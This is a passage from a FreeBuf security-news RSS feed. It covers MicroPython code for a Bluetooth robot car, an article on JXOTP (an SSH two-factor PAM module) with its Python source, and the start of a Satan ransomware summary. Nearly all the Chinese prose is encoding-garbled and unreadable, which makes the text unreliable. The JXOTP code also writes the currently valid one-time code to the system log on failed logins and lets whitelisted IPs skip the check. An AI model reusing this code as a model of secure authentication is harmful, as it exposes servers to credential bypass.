451<p style="text-align: justify;">以TPYBoard v102开呿¿ä¸ºä¸»æŽ§æ¿ï¼Œå°è½¦æ‰©å±•æ¿å…·æœ‰å››è·¯PWM调速电机ã€8ä¸ªå¯æŽ§LEDã€1个蜂鸣器ã€5路舵机接å£ã€1个è“牙接å£ã€1个PS2æ— çº¿æŽ¥å£ã€å¼•出TPYBoard v102开呿¿å…¨éƒ¨é’ˆè„šï¼Œå¯è£…载循迹模å—ã€è¶…声波模å—ã€æœºæ¢°æ‰‹è‡‚ã€çº¢å¤–接收头,兼容入门级电机和专业级电机,两节18650å•独供电。</p>
452<p> <img alt="TPYBoard之DIYä¸€ä¸ªæ— çº¿è£…ç”²å°è½¦" src="http://image.3001.net/images/20180719/15319687852.png!small" width="399" height="531.6462765957447"> </p>
453<h2>å…ã€<b>æºä»£ç </b><b></b></h2>
454<p>我们åªéœ€è¦æŠŠTPYBoard v102 æ’å°è½¦æ‰©å±•æ¿ä¸Šï¼ŒæŠŠè“ç‰™æ¨¡å—æ’上,把程åºå†™å…¥å°±è¡Œ,䏋颿˜¯main.pyæºç¨‹åº</p>
455</p>
456<pre><code><p># main.py -- put your code here!</p><p>from pyb import Pin</p><p>from pyb import UART</p><p> </p><p>N1 = Pin('Y1', Pin.OUT_PP)</p><p>N2 = Pin('Y2', Pin.OUT_PP)</p><p>N3 = Pin('Y3', Pin.OUT_PP)</p><p>N4 = Pin('Y4', Pin.OUT_PP)</p><p>N5 = Pin('Y6', Pin.OUT_PP)</p><p>N6 = Pin('Y7', Pin.OUT_PP)</p><p>N7 = Pin('Y8', Pin.OUT_PP)</p><p>N8 = Pin('Y9', Pin.OUT_PP)</p><p> </p><p>led_red=Pin('Y5', Pin.OUT_PP)</p><p>led_right=Pin('Y12', Pin.OUT_PP)</p><p>led_left=Pin('Y11', Pin.OUT_PP)</p><p> </p><p>led_red.value(1)</p><p>led_right.value(0)</p><p>led_left.value(0)</p><p> </p><p> </p><p>blue=UART(1,9600,timeout=100)</p><p> </p><p>def go(speed):</p><p> M1_0=pyb.Timer(8, freq=10000).channel(1, pyb.Timer.PWM, pin=pyb.Pin.board.Y1, pulse_width=(speed*200)+10000)</p><p> M1_1=pyb.Timer(8, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y2, pulse_width=0)</p><p> </p><p> M2_0=pyb.Timer(4, freq=10000).channel(3, pyb.Timer.PWM, pin=pyb.Pin.board.Y3, pulse_width=(speed*100)+5000)</p><p> M2_1=pyb.Timer(4, freq=10000).channel(4, pyb.Timer.PWM, pin=pyb.Pin.board.Y4, pulse_width=0)</p><p> </p><p> M3_0=pyb.Timer(1, freq=10000).channel(1, pyb.Timer.PWM, pin=pyb.Pin.board.Y6, pulse_width=(speed*220)+10000)</p><p> M3_1=pyb.Timer(1, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y7, pulse_width=0)</p><p> </p><p> M4_0=pyb.Timer(2, freq=10000).channel(3, pyb.Timer.PWM, pin=pyb.Pin.board.Y9, pulse_width=(speed*50)+5000)</p><p> M4_1=pyb.Timer(12, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y8, pulse_width=0)</p><p> </p><p> led_red.value(0)</p><p> </p><p>def back(speed):</p><p> M1_0=pyb.Timer(8, freq=10000).channel(1, pyb.Timer.PWM, pin=pyb.Pin.board.Y1, pulse_width=0)</p><p> M1_1=pyb.Timer(8, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y2, pulse_width=(speed*200)+10000)</p><p> </p><p> M2_0=pyb.Timer(4, freq=10000).channel(3, pyb.Timer.PWM, pin=pyb.Pin.board.Y3, pulse_width=0)</p><p> M2_1=pyb.Timer(4, freq=10000).channel(4, pyb.Timer.PWM, pin=pyb.Pin.board.Y4, pulse_width=(speed*100)+10000)</p><p> </p><p> M3_0=pyb.Timer(1, freq=10000).channel(1, pyb.Timer.PWM, pin=pyb.Pin.board.Y6, pulse_width=0)</p><p> M3_1=pyb.Timer(1, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y7, pulse_width=(speed*200)+10000)</p><p> </p><p> M4_0=pyb.Timer(2, freq=10000).channel(3, pyb.Timer.PWM, pin=pyb.Pin.board.Y9, pulse_width=0)</p><p> M4_1=pyb.Timer(12, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y8, pulse_width=(speed*100)+10000)</p><p> </p><p> led_red.value(1)</p><p> </p><p>def stop():</p><p> M1_0=pyb.Timer(8, freq=10000).channel(1, pyb.Timer.PWM, pin=pyb.Pin.board.Y1, pulse_width=0)</p><p> M1_1=pyb.Timer(8, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y2, pulse_width=0)</p><p> </p><p> M2_0=pyb.Timer(4, freq=10000).channel(3, pyb.Timer.PWM, pin=pyb.Pin.board.Y3, pulse_width=0)</p><p> M2_1=pyb.Timer(4, freq=10000).channel(4, pyb.Timer.PWM, pin=pyb.Pin.board.Y4, pulse_width=0)</p><p> </p><p> M3_0=pyb.Timer(1, freq=10000).channel(1, pyb.Timer.PWM, pin=pyb.Pin.board.Y6, pulse_width=0)</p><p> M3_1=pyb.Timer(1, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y7, pulse_width=0)</p><p> </p><p> M4_0=pyb.Timer(12, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y8, pulse_width=0)</p><p> M4_1=pyb.Timer(2, freq=10000).channel(3, pyb.Timer.PWM, pin=pyb.Pin.board.Y9, pulse_width=0)</p><p> led_right.value(0)</p><p> led_left.value(0)</p><p> led_red.value(1)</p><p> </p><p>def left(speed):</p><p> M1_0=pyb.Timer(8, freq=10000).channel(1, pyb.Timer.PWM, pin=pyb.Pin.board.Y1, pulse_width=(speed*30)+10000)</p><p> M1_1=pyb.Timer(8, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y2, pulse_width=0)</p><p> </p><p> M2_0=pyb.Timer(4, freq=10000).channel(3, pyb.Timer.PWM, pin=pyb.Pin.board.Y3, pulse_width=(speed*100)+10000)</p><p> M2_1=pyb.Timer(4, freq=10000).channel(4, pyb.Timer.PWM, pin=pyb.Pin.board.Y4, pulse_width=0)</p><p> </p><p> M3_0=pyb.Timer(1, freq=10000).channel(1, pyb.Timer.PWM, pin=pyb.Pin.board.Y6, pulse_width=(speed*30)+10000)</p><p> M3_1=pyb.Timer(1, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y7, pulse_width=0)</p><p> </p><p> M4_0=pyb.Timer(2, freq=10000).channel(3, pyb.Timer.PWM, pin=pyb.Pin.board.Y9, pulse_width=(speed*100)+10000)</p><p> M4_1=pyb.Timer(12, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y8, pulse_width=0)</p><p> led_right.value(1)</p><p> led_left.value(0)</p><p> </p><p>def right(speed):</p><p> M1_0=pyb.Timer(8, freq=10000).channel(1, pyb.Timer.PWM, pin=pyb.Pin.board.Y1, pulse_width=(speed*200)+20000)</p><p> M1_1=pyb.Timer(8, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y2, pulse_width=0)</p><p> </p><p> M2_0=pyb.Timer(4, freq=10000).channel(3, pyb.Timer.PWM, pin=pyb.Pin.board.Y3, pulse_width=(speed*200)+3000)</p><p> M2_1=pyb.Timer(4, freq=10000).channel(4, pyb.Timer.PWM, pin=pyb.Pin.board.Y4, pulse_width=0)</p><p> </p><p> M3_0=pyb.Timer(1, freq=10000).channel(1, pyb.Timer.PWM, pin=pyb.Pin.board.Y6, pulse_width=(speed*100)+20000)</p><p> M3_1=pyb.Timer(1, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y7, pulse_width=0)</p><p> </p><p> M4_0=pyb.Timer(2, freq=10000).channel(3, pyb.Timer.PWM, pin=pyb.Pin.board.Y9, pulse_width=(speed*100)+3000)</p><p> M4_1=pyb.Timer(12, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y8, pulse_width=0)</p><p> led_right.value(0)</p><p> led_left.value(1)</p><p> </p><p>while True:</p><p> if blue.any()>0:</p><p> data=blue.read().decode()</p><p> print(data)</p><p> if data.find('0')>-1:</p><p> stop()</p><p> if data.find('1')>-1:</p><p> pyb.LED(2).on()</p><p> pyb.LED(3).off()</p><p> pyb.LED(4).off()</p><p> go(5)</p><p> if data.find('2')>-1:</p><p> pyb.LED(2).off()</p><p> pyb.LED(3).on()</p><p> pyb.LED(4).off()</p><p> back(5)</p><p> if data.find('3')>-1:</p><p> pyb.LED(2).off()</p><p> pyb.LED(3).off()</p><p> pyb.LED(4).on()</p><p> left(5)</p><p> if data.find('4')>-1:</p><p> pyb.LED(2).off()</p><p> pyb.LED(3).off()</p><p> pyb.LED(4).on()</p><p> right(5)</p></code></pre>
457</p>
458<p>需è¦è‡ªå·±ç»„装å°è½¦ï¼Œç¡¬ä»¶æŽ¥çº¿ä¸éœ€è¦æŽ¥ï¼Œåªéœ€è¦å°†å•片机和è“ç‰™æ¨¡å—æ’到扩展æ¿ä¸Šï¼Œç„¶åŽæŠŠç¨‹åºå¤åˆ¶åˆ°main.pyä¸ï¼Œç„¶åŽæ‰‹æœºä¸‹è½½å¥½app,就å¯ä»¥æŽ§åˆ¶å°è½¦çˆ¬å¡ï¼Œå‰è¿›ï¼ŒåŽé€€äº†ï¼ŒåŠ¨æ‰‹é€ èµ·æ¥å§ï¼ï¼ï¼ï¼ </p>
459<p><b style="color: rgb(159, 163, 168);">*本文作者:_æ©™å ã‚,转载请注明æ¥è‡ªFreeBuf.COM</b></p>
460]]></content:encoded>
461 <wfw:commentRss>http://www.freebuf.com/geek/178005.html/feed</wfw:commentRss>
462 <slash:comments>1</slash:comments>
463 </item>
464 <item>
465 <title>å¼€æºSSHåŒå› ç´ ç™»é™†è®¤è¯ç³»ç»ŸJXOTP了解一下</title>
466 <link>http://www.freebuf.com/sectool/178161.html</link>
467 <comments>http://www.freebuf.com/sectool/178161.html#comments</comments>
468 <pubDate>Thu, 26 Jul 2018 01:00:27 +0000</pubDate>
469 <dc:creator>chenjc</dc:creator>
470 <category><![CDATA[工具]]></category>
471 <category><![CDATA[ssh]]></category>
472 <category><![CDATA[æš´åŠ›ç ´è§£]]></category>
473
474 <guid isPermaLink="false">http://www.freebuf.com/?p=178161</guid>
475 <description><![CDATA[一ã€å‰è¨€ 这就是个新的轮åï¼ŒæŠ€æœ¯ä¸Šæ²¡æœ‰å¤§çš„åˆ›æ–°ï¼Œåªæ˜¯æ›´å¥½ç”¨ä¸€äº›ã€‚SSHåŒå› ç´ è®¤è¯çš„å¼€æºæ–¹æ¡ˆæœ‰æŒºå¤šçš„,但是实践应用ä¸å‘çŽ°æœ‰ä¸‰ä¸ªé—®é¢˜ï¼Œè®©æŽ¨å¹¿çš„æƒ…å†µä¸æ˜¯å¾ˆå¥½ã€‚ 以google otp为例: 1ã€éœ€è¦å®‰è£…APP 2ã€éœ€è¦ä¿®æ”¹å®¢æˆ·ç«¯sshçš„ç™»é™†æ–¹å¼ 3ã€æ— 法集ä¸ç®¡ç† 第三点先ä¸è°ˆï¼Œå› 为跟用户没啥关系。å‰é¢ä¸¤ç‚¹å¯¹äºŽè¿ç»´äººå‘˜è¿˜å¥½è¯´ï¼Œä½†æ˜¯å¯¹äºŽå…¶ä»–的人æ¥è¯´å°±ä¸æ˜¯é‚£ä¹ˆå‹å¥½ï¼Œç‰¹åˆ«æ˜¯ç¬¬äºŒä¸ªæ¥éª¤å¼•起的问题就比较多,比如ä¸åŒè½¯ä»¶ä¸åŒçš„é…置方å¼ç‰ã€‚ 所以优化的æ€è·¯å°±æ˜¯å°½é‡é€æ˜ŽåŒ–,越方便越好。 JXOTPè®¡åˆ’æœ‰ä¸¤ä¸ªç‰ˆæœ¬ï¼Œä¸€ä¸ªæ˜¯å•æœºç‰ˆæœ¬ï¼Œä¸€ä¸ªæ˜¯ä¼ä¸šç‰ˆæœ¬ï¼Œé’ˆå¯¹çš„æ˜¯ä¸åŒçš„需求,目å‰å¼€æºçš„æ˜¯å•机版本,ä¼ä¸šç‰ˆæœ¬è¿˜åœ¨å†…测ä¸ï¼ŒåŽç»ä¼šæ”¾å‡ºã€‚ 啿œºç‰ˆæœ¬æ¯”è¾ƒé€‚åˆæœåŠ¡å™¨å°‘çš„æƒ…å†µï¼ŒåŒºåˆ†ç¨‹åº¦å¯ä»¥ç®€å•划为管ç†çš„æœåŠ¡å™¨æ˜¯å¦å¤šäºŽ10å°ï¼Œ10å°ä»¥å†…ï¼Œç‰¹åˆ«æ˜¯åªæœ‰å‡ å°æœåŠ¡å™¨çš„æƒ…å†µä¸‹ï¼Œç”¨å•æœºç‰ˆæœ¬æ˜¯ä¸ªä¸é”™çš„选择。 写这个JXOTP的背景是,云上的æœåŠ¡å™¨è¢«æ²¡å®Œæ²¡äº†çš„æ€¼ï¼Œæ¯æ—¶æ¯åˆ»éƒ½è¢«è¿›è¡ŒSSHæš´åŠ›ç ´è§£ï¼Œè™½è¯´å¯†ç æœ¬èº«ä¸å¼±ï¼Œä½†æ˜¯å“ªå¤©è¦æ˜¯è¢«æ’žåº“了也没地方说ç†åŽ»ï¼Œæ‰€ä»¥ä¿é™©èµ·è§è¿˜æ˜¯ä¸Šä¸ªåŒå› ç´ è®¤è¯ç³»ç»Ÿå¥½ã€‚ 二ã€éƒ¨ç½² ç›®å‰åœ¨centos6/7上测试通过,其他系统自测。 安装如下: 1ã€# git clone https://github.com/jx-sec/jxotp.git 2ã€# cd jxotp 3ã€# sh install_otp.sh 结果如下: æ‹¿å‡ºä½ å‘è´¢çš„å°æ‰‹ï¼Œæ‰“开微信å°ç¨‹åºï¼Œæœç´¢ “è¿ç»´å¯†ç ” ï¼Œæ‰“å¼€åŽ ç‚¹å‡» “æ·»åŠ åœºæ™¯” 扫æäºŒç»´ç å³å¯å®ŒæˆOTPçš„é…置。 æœ€åŽæ˜¯åœ¨æœåŠ¡å™¨ä¸Šå¯ç”¨OTP功能: # vi /etc/pam.d/sshd åœ¨æœ€ä¸Šä¸€è¡Œæ·»åŠ ï¼š auth optional pam_python.so auth.py ä¿å˜æ–‡ä»¶å³å¯ç”Ÿæ•ˆï¼Œæ— 需é‡å¯sshdæœåŠ¡ã€‚ 安装é…置过程到æ¤ç»“æŸï¼Œä¸‹é¢æ ¡éªŒæ•ˆæžœï¼š # tail -F /var/log/messages 新开个窗å£ç™»é™†æœåŠ¡å™¨ï¼Œéšä¾¿è¾“入个密ç ,如123456: 日志为”sshd: otp auth log: login user is root,login fail,code is 123456,must 054040″。 code is 123456,是å–当å‰è¾“入密ç çš„åŽå…ä½ï¼Œå³123456。 must is 054040, 054040是当å‰OTP生æˆçš„code,需è¦å¯¹æ¯”è¿ç»´å¯†ç ä¸çš„code与æœåŠ¡å™¨çš„code是å¦ä¸€è‡´ï¼Œæ£å¸¸æœåŠ¡å™¨æ—¶é—´æ²¡é—®é¢˜çš„è¯ï¼Œæ˜¯ä¸€è‡´çš„。 当确定æœåŠ¡å™¨å’Œè¿ç»´å¯†ç çš„code一致åŽï¼Œå®‰è£…å°±æ¤ç»“æŸã€‚ å‡è®¾å¯†ç 为abcdfgww,code为951753,那么当登陆的时候,输入的密ç 为abcdfgww951753。 三ã€ä»£ç åˆ†æž # -*- coding: utf-8 -*- import syslog import pyotp OTP_SECRET = "YOU OTP SECRET KEY" # å¯ä»¥æ‰‹åŠ¨ä¿®æ”¹SECRET KEY,必须为16ä½base32æ ¼å¼å—符串 WHITE_IP = ["YOU BYPASS IP"] #设置白åå•IP,白åå•IPå°†æ— éœ€è¿›è¡ŒåŠ¨æ€å£ä»¤è®¤è¯ï¼Œé€‚åˆæœ‰å ¡åž’机的场景,或者固定IP的情况 GLOBAL_USER_CHECK = False #开坿‰€æœ‰ç³»ç»Ÿç”¨æˆ·åŒå› ç´ è®¤è¯ï¼Œé»˜è®¤ä¸ºå¦ï¼Œå³åªé’ˆå¯¹ç‰¹å®šç”¨æˆ·å¼€å¯åŒå› ç´ è®¤è¯ CHECK_USER = […]]]></description>
476 <content:encoded><![CDATA[<h2>一ã€å‰è¨€</h2>
477<p><span style="color: rgb(0, 176, 80);"><b>这就是个新的轮åï¼ŒæŠ€æœ¯ä¸Šæ²¡æœ‰å¤§çš„åˆ›æ–°ï¼Œåªæ˜¯æ›´å¥½ç”¨ä¸€äº›ã€‚SSHåŒå› ç´ è®¤è¯çš„å¼€æºæ–¹æ¡ˆæœ‰æŒºå¤šçš„,但是实践应用ä¸å‘çŽ°æœ‰ä¸‰ä¸ªé—®é¢˜ï¼Œè®©æŽ¨å¹¿çš„æƒ…å†µä¸æ˜¯å¾ˆå¥½ã€‚</b></span></p>
478<p>以google otp为例:</p>
479<p>1ã€éœ€è¦å®‰è£…APP</p>
480<p>2ã€éœ€è¦ä¿®æ”¹å®¢æˆ·ç«¯ssh的登陆方å¼</p>
481<p>3ã€æ— 法集ä¸ç®¡ç†</p>
482<p>第三点先ä¸è°ˆï¼Œå› 为跟用户没啥关系。å‰é¢ä¸¤ç‚¹å¯¹äºŽè¿ç»´äººå‘˜è¿˜å¥½è¯´ï¼Œä½†æ˜¯å¯¹äºŽå…¶ä»–的人æ¥è¯´å°±ä¸æ˜¯é‚£ä¹ˆå‹å¥½ï¼Œç‰¹åˆ«æ˜¯ç¬¬äºŒä¸ªæ¥éª¤å¼•起的问题就比较多,比如ä¸åŒè½¯ä»¶ä¸åŒçš„é…置方å¼ç‰ã€‚</p>
483<p>所以优化的æ€è·¯å°±æ˜¯å°½é‡é€æ˜ŽåŒ–,越方便越好。</p>
484<p>JXOTPè®¡åˆ’æœ‰ä¸¤ä¸ªç‰ˆæœ¬ï¼Œä¸€ä¸ªæ˜¯å•æœºç‰ˆæœ¬ï¼Œä¸€ä¸ªæ˜¯ä¼ä¸šç‰ˆæœ¬ï¼Œé’ˆå¯¹çš„æ˜¯ä¸åŒçš„需求,目å‰å¼€æºçš„æ˜¯å•机版本,ä¼ä¸šç‰ˆæœ¬è¿˜åœ¨å†…测ä¸ï¼ŒåŽç»ä¼šæ”¾å‡ºã€‚</p>
485<p>啿œºç‰ˆæœ¬æ¯”è¾ƒé€‚åˆæœåŠ¡å™¨å°‘çš„æƒ…å†µï¼ŒåŒºåˆ†ç¨‹åº¦å¯ä»¥ç®€å•划为管ç†çš„æœåŠ¡å™¨æ˜¯å¦å¤šäºŽ10å°ï¼Œ10å°ä»¥å†…ï¼Œç‰¹åˆ«æ˜¯åªæœ‰å‡ å°æœåŠ¡å™¨çš„æƒ…å†µä¸‹ï¼Œç”¨å•æœºç‰ˆæœ¬æ˜¯ä¸ªä¸é”™çš„选择。</p>
486<p>写这个JXOTP的背景是,云上的æœåŠ¡å™¨è¢«æ²¡å®Œæ²¡äº†çš„æ€¼ï¼Œæ¯æ—¶æ¯åˆ»éƒ½è¢«è¿›è¡ŒSSHæš´åŠ›ç ´è§£ï¼Œè™½è¯´å¯†ç æœ¬èº«ä¸å¼±ï¼Œä½†æ˜¯å“ªå¤©è¦æ˜¯è¢«æ’žåº“了也没地方说ç†åŽ»ï¼Œæ‰€ä»¥ä¿é™©èµ·è§è¿˜æ˜¯ä¸Šä¸ªåŒå› ç´ è®¤è¯ç³»ç»Ÿå¥½ã€‚</p>
487<h2>二ã€éƒ¨ç½²</h2>
488<p>ç›®å‰åœ¨centos6/7上测试通过,其他系统自测。</p>
489<p>安装如下:</p>
490<p>1ã€# git clone <a href="https://github.com/jx-sec/jxotp.git" ref="">https://github.com/jx-sec/jxotp.git</a></p>
491<p>2ã€# cd jxotp</p>
492<p>3ã€# sh install_otp.sh</p>
493<p>结果如下:</p>
494<p><img alt="clipboard.png" src="http://image.3001.net/images/20180719/15319897144140.png" width="690" height="429"></p>
495<p>æ‹¿å‡ºä½ å‘è´¢çš„å°æ‰‹ï¼Œæ‰“开微信å°ç¨‹åºï¼Œæœç´¢ “è¿ç»´å¯†ç ” ï¼Œæ‰“å¼€åŽ ç‚¹å‡» “æ·»åŠ åœºæ™¯” 扫æäºŒç»´ç å³å¯å®ŒæˆOTPçš„é…置。</p>
496<p>æœ€åŽæ˜¯åœ¨æœåŠ¡å™¨ä¸Šå¯ç”¨OTP功能:</p>
497<pre><code># vi /etc/pam.d/sshd </code></pre>
498<p>åœ¨æœ€ä¸Šä¸€è¡Œæ·»åŠ ï¼š</p>
499<pre><code>auth optional pam_python.so auth.py</code></pre>
500<p><img alt="clipboard.png" src="http://image.3001.net/images/20180719/15319897379551.png" width="652" height="342"></p>
501<p>ä¿å˜æ–‡ä»¶å³å¯ç”Ÿæ•ˆï¼Œæ— 需é‡å¯sshdæœåŠ¡ã€‚</p>
502<p> 安装é…置过程到æ¤ç»“æŸï¼Œä¸‹é¢æ ¡éªŒæ•ˆæžœï¼š</p>
503<pre><code># tail -F /var/log/messages</code></pre>
504<p>新开个窗å£ç™»é™†æœåŠ¡å™¨ï¼Œéšä¾¿è¾“入个密ç ,如123456:</p>
505<p><img alt="clipboard.png" src="http://image.3001.net/images/20180719/15319897615450.png" width="690" height="164"></p>
506<p>日志为”sshd: otp auth log: login user is root,login fail,code is 123456,must 054040″。</p>
507<p>code is 123456,是å–当å‰è¾“入密ç çš„åŽå…ä½ï¼Œå³123456。</p>
508<p>must is 054040, 054040是当å‰OTP生æˆçš„code,需è¦å¯¹æ¯”è¿ç»´å¯†ç ä¸çš„code与æœåŠ¡å™¨çš„code是å¦ä¸€è‡´ï¼Œæ£å¸¸æœåŠ¡å™¨æ—¶é—´æ²¡é—®é¢˜çš„è¯ï¼Œæ˜¯ä¸€è‡´çš„。</p>
509<p>当确定æœåŠ¡å™¨å’Œè¿ç»´å¯†ç çš„code一致åŽï¼Œå®‰è£…å°±æ¤ç»“æŸã€‚</p>
510<p>å‡è®¾å¯†ç 为abcdfgww,code为951753,那么当登陆的时候,输入的密ç 为abcdfgww951753。</p>
511<h2>三ã€ä»£ç 分æž</h2>
512<pre><code># -*- coding: utf-8 -*-
513import syslog
514import pyotp
515
516OTP_SECRET = "YOU OTP SECRET KEY"
517# å¯ä»¥æ‰‹åŠ¨ä¿®æ”¹SECRET KEY,必须为16ä½base32æ ¼å¼å—符串
518WHITE_IP = ["YOU BYPASS IP"]
519#设置白åå•IP,白åå•IPå°†æ— éœ€è¿›è¡ŒåŠ¨æ€å£ä»¤è®¤è¯ï¼Œé€‚åˆæœ‰å ¡åž’机的场景,或者固定IP的情况
520GLOBAL_USER_CHECK = False
521#开坿‰€æœ‰ç³»ç»Ÿç”¨æˆ·åŒå› ç´ è®¤è¯ï¼Œé»˜è®¤ä¸ºå¦ï¼Œå³åªé’ˆå¯¹ç‰¹å®šç”¨æˆ·å¼€å¯åŒå› ç´ è®¤è¯
522CHECK_USER = ['root']
523#当GLOBAL_USER_CHECK = False时生效,é…置需è¦è¿›è¡ŒåŒå› ç´ è®¤è¯çš„ç”¨æˆ·ï¼Œå¯æ·»åŠ å¤šä¸ªç”¨æˆ·ï¼Œé»˜è®¤åªå¯¹root用户开å¯åŒå› ç´ è®¤è¯
524def otp_auth(code):
525 totp = pyotp.TOTP(OTP_SECRET)
526 if totp.now() == code:
527 return True
528 else:
529 return False
530#进行OTPæ ¡éªŒ
531def otp_log(msg):
532 syslog.openlog(facility=syslog.LOG_AUTH)
533 syslog.syslog("otp auth log: "+msg)
534 syslog.closelog()
535#记录日志
536def otp_code():
537 totp = pyotp.TOTP(OTP_SECRET)
538 return totp.now()
539#获å–当剿—¶é—´çš„code
540def pam_sm_authenticate(pamh, flags, argv):
541 for white in WHITE_IP:
542 if pamh.rhost == white:
543 otp_log("white ip login,ip is "+pamh.rhost)
544 return pamh.PAM_SUCCESS
545#åˆ¤æ–æ˜¯å¦æœ‰ç™½åå•IP,有的è¯ç›´æŽ¥è¿”å›žéªŒè¯æˆåŠŸï¼Œæ— éœ€è¿›è¡ŒåŒå› ç´ è®¤è¯
546 if GLOBAL_USER_CHECK:
547#åˆ¤æ–æ˜¯å¦å¼€å¯åŒå› ç´ è®¤è¯
548 resp = pamh.conversation(pamh.Message(pamh.PAM_PROMPT_ECHO_OFF,'Password:'))
549#获å–输入的密ç
550 code = resp.resp[-6:]
551#å–密ç åŽå…ä½
552 if otp_auth(code):
553 pamh.authtok = resp.resp[:-6]
554 otp_log("login user is "+pamh.user+",login success,code is "+resp.resp[-6:])
555 else:
556 pamh.authtok = ""
557 otp_log("login user is "+pamh.user+",login fail,code is "+ resp.resp[-6:]+",must "+otp_code())
558 return pamh.PAM_SUCCESS
559#判æ–密ç åŽå…ä½ä¸ŽæœåС噍code是å¦ä¸€è‡´ï¼Œå¦‚果是将密ç åŽå…ä½åˆ 除,é‡å†™å¯†ç 傿•°ï¼Œå¦‚æžœä¸æ˜¯å°†æ•´ä¸ªå¯†ç 傿•°è®¾ç½®ä¸ºç©º
560 else:
561 for user in CHECK_USER:
562
563 if pamh.user == user:
564 resp = pamh.conversation(pamh.Message(pamh.PAM_PROMPT_ECHO_OFF,'Password:'))
565 code = resp.resp[-6:]
566 if otp_auth(code):
567 pamh.authtok = resp.resp[:-6]
568 otp_log("login user is "+pamh.user+",login success,code is "+resp.resp[-6:])
569 else:
570 pamh.authtok = ""
571 otp_log("login user is "+pamh.user+",login fail,code is "+ resp.resp[-6:]+",must "+otp_code())
572 else:
573 otp_log("user login otp check bypass,user is "+ pamh.user)
574 return pamh.PAM_SUCCESS
575#判æ–用户是å¦ä¸ºè®¾ç½®å¼€å¯æ ¡éªŒçš„ç”¨æˆ·ï¼Œä¸æ˜¯ç›´æŽ¥è¿”回æˆåŠŸï¼Œæ˜¯çš„è¯è¿›è¡Œæ£€æµ‹ï¼Œæµç¨‹åŒä¸Š
576
577def pam_sm_setcred(pamh, flags, argv):
578
579 return pamh.PAM_SUCCESS
580</code></pre>
581<h2>å››ã€æ€»ç»“ </h2>
582<p>æ–°è½®åæ›´å¥½ç”¨çš„地方主è¦ä½“现在,ä¸éœ€è¦åƒä¼ 统的方法去改sshdçš„é…置文件开å¯ChallengeResponseAuthentication选项,也å³å¯¹äºŽä½¿ç”¨çš„用户æ¥è¯´ï¼Œéƒ¨ç½²å®ŒåŽæ˜¯é€æ˜Žçš„ï¼Œæ— éœ€ä¿®æ”¹windows下登陆客户端的é…置,é™ä½Žä½¿ç”¨çš„æˆæœ¬ï¼Œå…¶æ¬¡æ”¯æŒç”¨æˆ·å’ŒIP设置,æé«˜äº†çµæ´»æ€§ï¼Œä½†æ˜¯ç›¸å¯¹ä¼ä¸šç‰ˆæ¥è¯´ï¼Œå•机版å˜åœ¨ä¸å¥½ç»´æŠ¤çš„问题,所以适åˆå°‘釿œåŠ¡å™¨ä½¿ç”¨ã€‚</p>
583<p><b style="color: rgb(159, 163, 168);">*本文作者chenjc,转载请注明æ¥è‡ªFreeBuf.COM。</b></p>
584]]></content:encoded>
585 <wfw:commentRss>http://www.freebuf.com/sectool/178161.html/feed</wfw:commentRss>
586 <slash:comments>0</slash:comments>
587 </item>
588 <item>
589 <title>è¯¦ç»†åˆ†æž | 全新“撒旦â€Satan勒索病毒æ¥è¢</title>
590 <link>http://www.freebuf.com/articles/system/178171.html</link>
591 <comments>http://www.freebuf.com/articles/system/178171.html#comments</comments>
592 <pubDate>Thu, 26 Jul 2018 00:30:07 +0000</pubDate>
593 <dc:creator>瑞星</dc:creator>
594 <category><![CDATA[系统安全]]></category>
595 <category><![CDATA[网络安全]]></category>
596 <category><![CDATA[勒索病毒]]></category>
597 <category><![CDATA[æ’’æ—¦]]></category>
598
599 <guid isPermaLink="false">http://www.freebuf.com/?p=178171</guid>
600 <description><![CDATA[近日,瑞星å¨èƒæƒ…报平å°å‘现多起国内用户感染“撒旦â€Satan勒索病毒事件。æ®ç‘žæ˜Ÿå®‰å…¨ç ”究人员介ç»ï¼Œè¯¥ç—…毒è¿è¡ŒåŽä¼šåР坆å—å®³è€…è®¡ç®—æœºæ–‡ä»¶ï¼ŒåŠ å¯†å®ŒæˆåŽä¼šç”¨ä¸è‹±éŸ©ä¸‰å›½è¯è¨€ç´¢å–1个比特å¸ä½œä¸ºèµŽé‡‘,并å¨èƒä¸‰å¤©å†…䏿”¯ä»˜å°†ä¸äºˆè§£å¯†ã€‚与以往常è§çš„勒索病毒ä¸åŒï¼Œâ€œæ’’æ—¦â€ä¸ä»…ä¼šå¯¹æ„ŸæŸ“ç—…æ¯’çš„ç”µè„‘ä¸‹æ‰‹ï¼ŒåŒæ—¶ç—…æ¯’è¿˜ä¼šåˆ©ç”¨å¤šä¸ªæ¼æ´žç»§ç»æ”»å‡»å…¶å®ƒç”µè„‘。 图:感染“撒旦â€ç—…毒åŽå¼¹å‡ºçš„å‹’ç´¢çª—å£ ç‘žæ˜Ÿå®‰å…¨ç ”ç©¶äººå‘˜å¯¹æœ€æ–°ç‰ˆæœ¬çš„â€œæ’’æ—¦â€Satan勒索病毒进行了分æžï¼Œå‘现该病毒与以往勒索病毒有较大的ä¸åŒï¼Œâ€œæ’’æ—¦â€Satan勒索病毒ä¸ä»…使用永æ’ä¹‹è“æ¼æ´žæ”»å‡»ï¼Œè¿˜å¢žåŠ äº†å…¶å®ƒçš„æ¼æ´žæ”»å‡»ã€‚åŒ…æ‹¬æ–‡ä»¶ä¸Šä¼ æ¼æ´žã€tomcatå¼±å£ä»¤æ¼æ´žã€WebLogic WLSç»„ä»¶æ¼æ´žã€JBOOS ååºåˆ—åŒ–æ¼æ´žç‰ã€‚ 